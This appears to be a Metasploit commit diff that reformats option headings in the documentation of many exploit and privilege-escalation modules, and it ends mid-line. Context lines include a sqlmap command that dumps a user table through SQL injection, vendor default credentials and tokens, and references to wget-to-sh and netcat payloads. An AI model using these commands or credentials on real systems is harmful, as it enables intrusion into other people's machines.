diff --git a/documentation/modules/exploit/aix/local/xorg_x11_server.md b/documentation/modules/exploit/aix/local/xorg_x11_server.md index a3cc00fc1e80b..bc6e3e6041e7c 100644 --- a/documentation/modules/exploit/aix/local/xorg_x11_server.md +++ b/documentation/modules/exploit/aix/local/xorg_x11_server.md @@ -34,11 +34,11 @@ This table lists all vulnerable Xorg versions: ## Options -**SESSION** +### SESSION Which session to use, which can be viewed with `sessions` -**WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/android/local/janus.md b/documentation/modules/exploit/android/local/janus.md index 1c563940ba24e..be17e60ac2241 100644 --- a/documentation/modules/exploit/android/local/janus.md +++ b/documentation/modules/exploit/android/local/janus.md @@ -77,7 +77,7 @@ Number of signers: 1 ## Options - **PACKAGE** +### PACKAGE Select a package to infect. A list of packages can be obtained by running `app_list` on meterpreter. Using `ALL` will loop through all packages and attempt to exploit them until successful. This can take a while, and cause lots of data to be diff --git a/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md b/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md index eebb7e1f0e305..18166fbba422b 100644 --- a/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md +++ b/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md @@ -34,11 +34,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md b/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md index 1acc4eba10675..0c5301fe5a952 100644 --- a/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md +++ b/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md @@ -31,7 +31,7 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` diff --git a/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md b/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md index 914f862489a0a..7b43074281168 100644 --- a/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md +++ b/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md @@ -25,7 +25,7 @@ ## Options - **ASUSWRTPORT** +### ASUSWRTPORT AsusWRT HTTP portal port (default: `80`) diff --git a/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md b/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md index 6d74786624add..a4a5247ba6667 100644 --- a/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md +++ b/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md @@ -24,12 +24,22 @@ https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=2862 ## Options -**USERNAME** The username for Cisco Firepower Management console. +### USERNAME -**PASSWORD** The password for Cisco Firepower Management console. +The username for Cisco Firepower Management console. -**NEWSSHUSER** The SSH account to create. By default, this is random. +### PASSWORD -**NEWSSHPASS** The SSH password for the new account. By default, this is also random. +The password for Cisco Firepower Management console. -**SSHPORT** In case for some reason, the SSH changed, otherwise this is 22 by default. +### NEWSSHUSER + +The SSH account to create. By default, this is random. + +### NEWSSHPASS + +The SSH password for the new account. By default, this is also random. + +### SSHPORT + +In case for some reason, the SSH changed, otherwise this is 22 by default. diff --git a/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md b/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md index 37d95b29bb9a3..93c564e5401d5 100644 --- a/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md +++ b/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md @@ -39,30 +39,30 @@ https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-2 ## Options -**RHOSTS** +### RHOSTS Configure the remote vulnerable system. -**RPORT** +### RPORT Configure the TCP port of the HTTP/HTTPS management web interface. -**USE_SSL** +### USE_SSL This flag controls whether the remote management web interface is accessible via HTTPS or not. Should be false for HTTP and true for HTTPS. -**PAYLOAD** +### PAYLOAD Configure the Metasploit payload that you want to stage. Must be for MIPS64 arch. Set payload Options accordingly. -**SRVHOST** +### SRVHOST The module stages the payload via a web server. This is the binding interface IP. Default can be set to 0.0.0.0. -**HTTPDelay** +### HTTPDelay This configures how long the module should wait for the incoming HTTP connection to the HTTP stager. diff --git a/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md b/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md index 5eb4265616ae7..6a2bf4de967b1 100644 --- a/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md +++ b/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md @@ -75,8 +75,10 @@ ddev launch The module has the following option: -- **ASSET_ID**: This option is required for older versions of Craft CMS, particularly in the 3.x series. - It specifies the asset ID for the Craft CMS instance. For 3.x versions, this ID must be set correctly to exploit the vulnerability. +### ASSET_ID + +This option is required for older versions of Craft CMS, particularly in the 3.x series. +It specifies the asset ID for the Craft CMS instance. For 3.x versions, this ID must be set correctly to exploit the vulnerability. For example, if you are targeting a Craft CMS version from the `>= 3.0.0`, `< 3.9.14`, make sure to specify the correct `ASSET_ID`. This is necessary for successful exploitation when dealing with these versions. diff --git a/documentation/modules/exploit/linux/http/goahead_ldpreload.md b/documentation/modules/exploit/linux/http/goahead_ldpreload.md index e810d8accd95e..307f10f0ce240 100644 --- a/documentation/modules/exploit/linux/http/goahead_ldpreload.md +++ b/documentation/modules/exploit/linux/http/goahead_ldpreload.md @@ -30,7 +30,7 @@ gcc ./cgitest.c -o cgi-bin/cgitest ## Options - **TARGET_URI** +### TARGET_URI Optional. The full path to a CGI endpoint on the target server. diff --git a/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md b/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md index 4674329af29f1..449b06bd7aae0 100644 --- a/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md +++ b/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md @@ -18,23 +18,23 @@ Tested on 2.7.18.0503. ## Options -**RPORT** +### RPORT Set this to the port for the REST API, usually 8081. -**WEBUI_PORT** +### WEBUI_PORT Set this to the port for the web UI, usually 8443. -**TOKEN** +### TOKEN Set this to the service token. Defaults to `AuroraSdnToken37`. -**USERNAME** +### USERNAME Set this to the service username. Defaults to `sdn`. -**PASSWORD** +### PASSWORD Set this to the service password. Defaults to `skyline`. diff --git a/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md b/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md index 29df881754224..d1899f0e164e5 100644 --- a/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md +++ b/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md @@ -16,11 +16,11 @@ ## Options - **PASSWORD** +### PASSWORD Password is set at install. May be blank, 'admin', or 'ipfire'. - **CMD** +### CMD This is the command to run on the system. diff --git a/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md b/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md index c6ead925f904c..0f76192655833 100644 --- a/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md +++ b/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md @@ -21,7 +21,7 @@ This module has been verified against: ## Options - **PASSWORD** +### PASSWORD Password is set at install. May be blank, 'admin', or 'ipfire'. @@ -45,4 +45,4 @@ This module has been verified against: uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid) whoami nobody - ``` \ No newline at end of file + ``` diff --git a/documentation/modules/exploit/linux/http/ipfire_pakfire_exec.md b/documentation/modules/exploit/linux/http/ipfire_pakfire_exec.md index f2d7902ff0a67..0f0370d3c6359 100644 --- a/documentation/modules/exploit/linux/http/ipfire_pakfire_exec.md +++ b/documentation/modules/exploit/linux/http/ipfire_pakfire_exec.md @@ -20,10 +20,10 @@ ## Options - **USERNAME** +### USERNAME Username of the administrative user you are authenticating to the web portal as. - **PASSWORD** +### PASSWORD Password for the administrative user you are authenticating to the web portal as. ## Scenarios diff --git a/documentation/modules/exploit/linux/http/ipfire_proxy_exec.md b/documentation/modules/exploit/linux/http/ipfire_proxy_exec.md index 3992497ed1815..f726854aa82b1 100644 --- a/documentation/modules/exploit/linux/http/ipfire_proxy_exec.md +++ b/documentation/modules/exploit/linux/http/ipfire_proxy_exec.md @@ -17,7 +17,7 @@ ## Options - **PASSWORD** +### PASSWORD Password is set at install. May be blank, 'admin', or 'ipfire'. @@ -44,4 +44,4 @@ uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid) whoami nobody - ``` \ No newline at end of file + ``` diff --git a/documentation/modules/exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth.md b/documentation/modules/exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth.md index 000be1999887f..b2cb5ed88b2f6 100644 --- a/documentation/modules/exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth.md +++ b/documentation/modules/exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth.md @@ -21,7 +21,7 @@ ## Options - **PAYLOAD** +### PAYLOAD The `generic` and `netcat` payload types are valid. diff --git a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md index 58d6ef26a38af..844c4ce578f65 100644 --- a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md +++ b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md @@ -30,11 +30,11 @@ anyway. ## Options - **USER_ID** +### USER_ID If you wish to exploit a particular ```USER_ID```, that can be specified here. Default is 1, which is most likely the admin account. - **API_TOKEN** +### API_TOKEN The SQLi included only works for MySQL, which should work in most cases. However, if you experience a different backend, you can enumerate the user table via sqlmap: ```sqlmap -u "http://[ip]/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump```. diff --git a/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md b/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md index d7c6c79322b00..3d7e5c86d98d4 100644 --- a/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md @@ -17,7 +17,7 @@ ## Options - **USERNAME** +### USERNAME The `USERNAME` option sets the username to authenticate the request with. The command injection will __not__ succeed if the username and password are not correct. @@ -25,7 +25,7 @@ your best bet will be to use the default username and password. - **PASSWORD** +### PASSWORD The `PASSWORD`options sets the password to authenticate the request with. The command injection will __not__ succeed if the username and password are not correct. diff --git a/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md b/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md index 334816b7b8ba8..ae4e33977b293 100644 --- a/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md +++ b/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md @@ -17,7 +17,7 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po ## Options - **PAYLOAD** +### PAYLOAD The valid payloads are `meterpreter` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh` diff --git a/documentation/modules/exploit/linux/http/op5_config_exec.md b/documentation/modules/exploit/linux/http/op5_config_exec.md index 4f0a713ff9fc4..ec1eb51ed261e 100644 --- a/documentation/modules/exploit/linux/http/op5_config_exec.md +++ b/documentation/modules/exploit/linux/http/op5_config_exec.md @@ -24,11 +24,11 @@ Just a few quick notes on setting up a vulnerable lab with this software. ## Options - **PASSWORD** +### PASSWORD Password is 'monitor' by default. - **USERNAME** +### USERNAME Documentation was unclear on this. Installing just the app, the username was 'monitor' by default. However it looks like if you @@ -60,4 +60,4 @@ Just a few quick notes on setting up a vulnerable lab with this software. monitor id uid=299(monitor) gid=48(apache) groups=48(apache),14(uucp),488(smstools) context=system_u:system_r:initrc_t:s0 - ``` \ No newline at end of file + ``` diff --git a/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md b/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md index 4d0e564ce6fb6..85b321e071a2e 100644 --- a/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md @@ -26,11 +26,11 @@ Launch metasploit and set the appropriate options: ## Options - **USERNAME** +### USERNAME The username for Pandora FMS. - **PASSWORD** +### PASSWORD The password for Pandora FMS. diff --git a/documentation/modules/exploit/linux/http/panos_readsessionvars.md b/documentation/modules/exploit/linux/http/panos_readsessionvars.md index 21b657746c08a..6d83b99290422 100644 --- a/documentation/modules/exploit/linux/http/panos_readsessionvars.md +++ b/documentation/modules/exploit/linux/http/panos_readsessionvars.md @@ -24,9 +24,9 @@ This VM is not generally available, but the specific disk image used was `PA-VM- ## Options -**CBHOST** The callback listener address if the default is not accurate (port forwarding, etc) +### CBHOST The callback listener address if the default is not accurate (port forwarding, etc) -**CBPORT** The callback listener port +### CBPORT The callback listener port ## Scenarios diff --git a/documentation/modules/exploit/linux/http/php_imap_open_rce.md b/documentation/modules/exploit/linux/http/php_imap_open_rce.md index 2115155f74ab8..bf2212004921a 100644 --- a/documentation/modules/exploit/linux/http/php_imap_open_rce.md +++ b/documentation/modules/exploit/linux/http/php_imap_open_rce.md @@ -312,7 +312,7 @@ Make sure `php-imap` is installed and enabled. Create `imap.php` with the follo ## Options - **TARGETURI** +### TARGETURI The URI for the target. This may change by target. Default is ` `. Prestashop should be the admin URI, similar to `/admin2769gx8k3`. diff --git a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md index 9cede0e79f042..141c1293e8143 100644 --- a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md @@ -21,7 +21,7 @@ Id Name ## Options -**SID** +### SID Set this to a valid administrator session ID. Typically retrieved using the `auxiliary/gather/pulse_secure_file_disclosure` module. diff --git a/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md b/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md index 7fa2b780b7e49..1ac4d39df087c 100644 --- a/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md +++ b/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md @@ -36,11 +36,11 @@ ## Options - **USERNAME** +### USERNAME Username for the application. (default: `admin`) - **PASSWORD** +### PASSWORD Password for the application. (default: `admin`) diff --git a/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md b/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md index 8b63cf55ec0e1..05433e1037a37 100644 --- a/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md +++ b/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md @@ -32,15 +32,15 @@ ## Options - **HttpUsername** +### HttpUsername Username for HTTP basic auth which is set in the conf file(optional) - **HttpPassword** +### HttpPassword Password for HTTP basic auth which is set in the conf file(optional) - **TARGETURI** +### TARGETURI The path to the XML-RPC endpoint diff --git a/documentation/modules/exploit/linux/http/tiki_calendar_exec.md b/documentation/modules/exploit/linux/http/tiki_calendar_exec.md index 64f396536d06c..3ea2346a7a90b 100644 --- a/documentation/modules/exploit/linux/http/tiki_calendar_exec.md +++ b/documentation/modules/exploit/linux/http/tiki_calendar_exec.md @@ -66,7 +66,7 @@ vs ## Options - **PASSWORD** +### PASSWORD Password is set at first login. Default for admin is 'admin'. diff --git a/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md b/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md index a2d6f1b60bf0e..4ab523487e193 100644 --- a/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md +++ b/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md @@ -25,7 +25,9 @@ according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getti ## Options - **TARGETURI** : The URI of the Unraid application +### TARGETURI + +The URI of the Unraid application ## Scenarios diff --git a/documentation/modules/exploit/linux/http/wazuh_auth_rce_cve_2025_24016.md b/documentation/modules/exploit/linux/http/wazuh_auth_rce_cve_2025_24016.md index 9759f4a763333..1270542469e5d 100644 --- a/documentation/modules/exploit/linux/http/wazuh_auth_rce_cve_2025_24016.md +++ b/documentation/modules/exploit/linux/http/wazuh_auth_rce_cve_2025_24016.md @@ -277,7 +277,7 @@ the vulnerable code will not be triggered. you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings. ## Options -**API Credentials:** +### API Credentials: `API_PWD` Wazuh API password (MyS3cr37P450r.*-) `API_USER` Wazuh API user (wazuh-wui) diff --git a/documentation/modules/exploit/linux/http/webmin_backdoor.md b/documentation/modules/exploit/linux/http/webmin_backdoor.md index 687edb4575ad2..54845e9c2b60e 100644 --- a/documentation/modules/exploit/linux/http/webmin_backdoor.md +++ b/documentation/modules/exploit/linux/http/webmin_backdoor.md @@ -63,15 +63,15 @@ Id Name ## Options -**RPORT** +### RPORT Set this to the Webmin port. The default is 10000. -**TARGETURI** +### TARGETURI Set this to the Webmin base path. The default is `/`. -**ForceExploit** +### ForceExploit Set this to `true` to override the `check` result during exploitation. diff --git a/documentation/modules/exploit/linux/http/wipg1000_cmd_injection.md b/documentation/modules/exploit/linux/http/wipg1000_cmd_injection.md index 048bed1d83bed..780467797f186 100644 --- a/documentation/modules/exploit/linux/http/wipg1000_cmd_injection.md +++ b/documentation/modules/exploit/linux/http/wipg1000_cmd_injection.md @@ -22,7 +22,7 @@ ## Options - **PAYLOAD** +### PAYLOAD The `generic`,`netcat` and `openssl` payload types are valid. diff --git a/documentation/modules/exploit/linux/local/abrt_raceabrt_priv_esc.md b/documentation/modules/exploit/linux/local/abrt_raceabrt_priv_esc.md index a78a07d1c2a6a..87d760eff1831 100644 --- a/documentation/modules/exploit/linux/local/abrt_raceabrt_priv_esc.md +++ b/documentation/modules/exploit/linux/local/abrt_raceabrt_priv_esc.md @@ -35,15 +35,15 @@ ## Options - **USERNAME** +### USERNAME Username for the new UID=0 user (default: random) - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md b/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md index 7fcff3830b1ce..758d296b33199 100644 --- a/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md +++ b/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md @@ -33,11 +33,11 @@ ## Options - **TIMEOUT** +### TIMEOUT Timeout for `sosreport` (seconds) (default: `600`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md b/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md index dfc67df761ac3..2b4f8456c5468 100644 --- a/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md +++ b/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md @@ -40,19 +40,19 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **TIMEOUT** +### TIMEOUT Race timeout (seconds). (default: `600`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) diff --git a/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md b/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md index badf782bbaee4..a4fabe00c6f04 100644 --- a/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md +++ b/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md @@ -43,15 +43,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) diff --git a/documentation/modules/exploit/linux/local/apport_abrt_chroot_priv_esc.md b/documentation/modules/exploit/linux/local/apport_abrt_chroot_priv_esc.md index 4ff8c0320361e..ce48db13d2869 100644 --- a/documentation/modules/exploit/linux/local/apport_abrt_chroot_priv_esc.md +++ b/documentation/modules/exploit/linux/local/apport_abrt_chroot_priv_esc.md @@ -32,11 +32,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md b/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md index 0fee4f44f721e..e8559eddf2d85 100644 --- a/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md +++ b/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md @@ -42,19 +42,19 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **SUID_EXECUTABLE** +### SUID_EXECUTABLE Path to a SUID executable compiled with ASan. (default: ``) - **SPRAY_SIZE** +### SPRAY_SIZE Number of PID symlinks to create. (default: `50`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md b/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md index 23848c9dd50e7..9a5e20617ab13 100644 --- a/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md +++ b/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md @@ -45,11 +45,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/bpf_priv_esc.md b/documentation/modules/exploit/linux/local/bpf_priv_esc.md index 6109907adb2a6..8324b4cda90a2 100644 --- a/documentation/modules/exploit/linux/local/bpf_priv_esc.md +++ b/documentation/modules/exploit/linux/local/bpf_priv_esc.md @@ -53,15 +53,15 @@ There are a few requirements for this module to work: ## Options - **MAXWAIT** +### MAXWAIT The first stage of this priv esc can take ~35 seconds to execute. This is the timer on how long we should wait till we give up on the first stage finishing. Defaults to `120` (seconds) - **WritableDir** +### WritableDir A folder we can write files to. Defaults to `/tmp` - **COMPILE** +### COMPILE If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to `Auto` diff --git a/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md b/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md index dc521c59e2b09..250211e99f707 100644 --- a/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md +++ b/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md @@ -40,11 +40,11 @@ ## Options - **WritableDir** +### WritableDir A folder we can write files to. Defaults to `/tmp` - **COMPILE** +### COMPILE If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to `Auto` diff --git a/documentation/modules/exploit/linux/local/cve_2021_3493_overlayfs.md b/documentation/modules/exploit/linux/local/cve_2021_3493_overlayfs.md index c5e57b91cb71f..5864d8a62f2fd 100644 --- a/documentation/modules/exploit/linux/local/cve_2021_3493_overlayfs.md +++ b/documentation/modules/exploit/linux/local/cve_2021_3493_overlayfs.md @@ -35,10 +35,13 @@ compilation on target, False will upload a precompiled binary. AUTO will favor but will fall back to the precompiled option if a compiler cannot be found. ### WritableDir + This indicates the location where you would like the payload and exploit binary stored, as well as serving as a location to store the various files and directories created by the exploit itself. The default value is `/tmp` +## Scenarios + ### Ubuntu 20.04.0 x64 ``` @@ -91,9 +94,9 @@ The binaries used by this exploit `data/exploits/CVE-2021-3493/cve_2021_3493.x64 `data/exploits/CVE-2021-3493/cve_2021_3493.x64.elf` can and be used separately from metasploit. The parameters required are: ``` - // argv[1] = The payload or executable you wish to launch - // argv[2] = A directory to store the files and directories created when the exploit runs - // argv[3] = A random string that is used to create directory names. +// argv[1] = The payload or executable you wish to launch +// argv[2] = A directory to store the files and directories created when the exploit runs +// argv[3] = A random string that is used to create directory names. ``` ``` msfuser@ubuntu-18041:~$ id diff --git a/documentation/modules/exploit/linux/local/glibc_ld_audit_dso_load_priv_esc.md b/documentation/modules/exploit/linux/local/glibc_ld_audit_dso_load_priv_esc.md index 30ef3eb2c3d29..f2a12d7e516ad 100644 --- a/documentation/modules/exploit/linux/local/glibc_ld_audit_dso_load_priv_esc.md +++ b/documentation/modules/exploit/linux/local/glibc_ld_audit_dso_load_priv_esc.md @@ -32,11 +32,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/glibc_origin_expansion_priv_esc.md b/documentation/modules/exploit/linux/local/glibc_origin_expansion_priv_esc.md index da4cb3318d09d..cc5e5b6b5c478 100644 --- a/documentation/modules/exploit/linux/local/glibc_origin_expansion_priv_esc.md +++ b/documentation/modules/exploit/linux/local/glibc_origin_expansion_priv_esc.md @@ -43,11 +43,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md b/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md index 12576f63e3dbd..692cc1a72a75c 100644 --- a/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md +++ b/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md @@ -31,15 +31,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) diff --git a/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md b/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md index 9fab3b0792dfb..4f89e6da7af93 100644 --- a/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md +++ b/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md @@ -99,11 +99,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md index 933be480ed07d..908836f3a37a8 100644 --- a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md +++ b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md @@ -29,11 +29,11 @@ ## Options - **KTSUSS_PATH** +### KTSUSS_PATH Path to `ktsuss` executable (default: `/usr/bin/ktsuss`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md b/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md index 8532e6281d507..8ce80d541b6da 100644 --- a/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md +++ b/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md @@ -58,11 +58,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md b/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md index e455adf27714d..ef107c80325a3 100644 --- a/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md +++ b/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md @@ -48,19 +48,19 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **PASSWORD** +### PASSWORD Password for the current user. (default: blank) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) diff --git a/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md b/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md index 2fa286508c852..0b4d63081c19d 100644 --- a/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md +++ b/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md @@ -32,15 +32,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) diff --git a/documentation/modules/exploit/linux/local/netfilter_priv_esc_ipv4.md b/documentation/modules/exploit/linux/local/netfilter_priv_esc_ipv4.md index 686f20afaa477..d5d36dbe0e287 100644 --- a/documentation/modules/exploit/linux/local/netfilter_priv_esc_ipv4.md +++ b/documentation/modules/exploit/linux/local/netfilter_priv_esc_ipv4.md @@ -34,15 +34,15 @@ This does not work against the following vulnerable systems. Additional work ma ## Options - **MAXWAIT** +### MAXWAIT The first stage of this priv esc can take ~35seconds to execute. This is the timer on how long we should wait till we give up on the first stage finishing. Defaults to 120 (seconds) - **WritableDir** +### WritableDir A folder we can write files to. Defaults to /tmp - **REEXPLOIT** +### REEXPLOIT When re-exploiting, no need to run desc (it may even fail), so we can simply run pwn and get our shell. diff --git 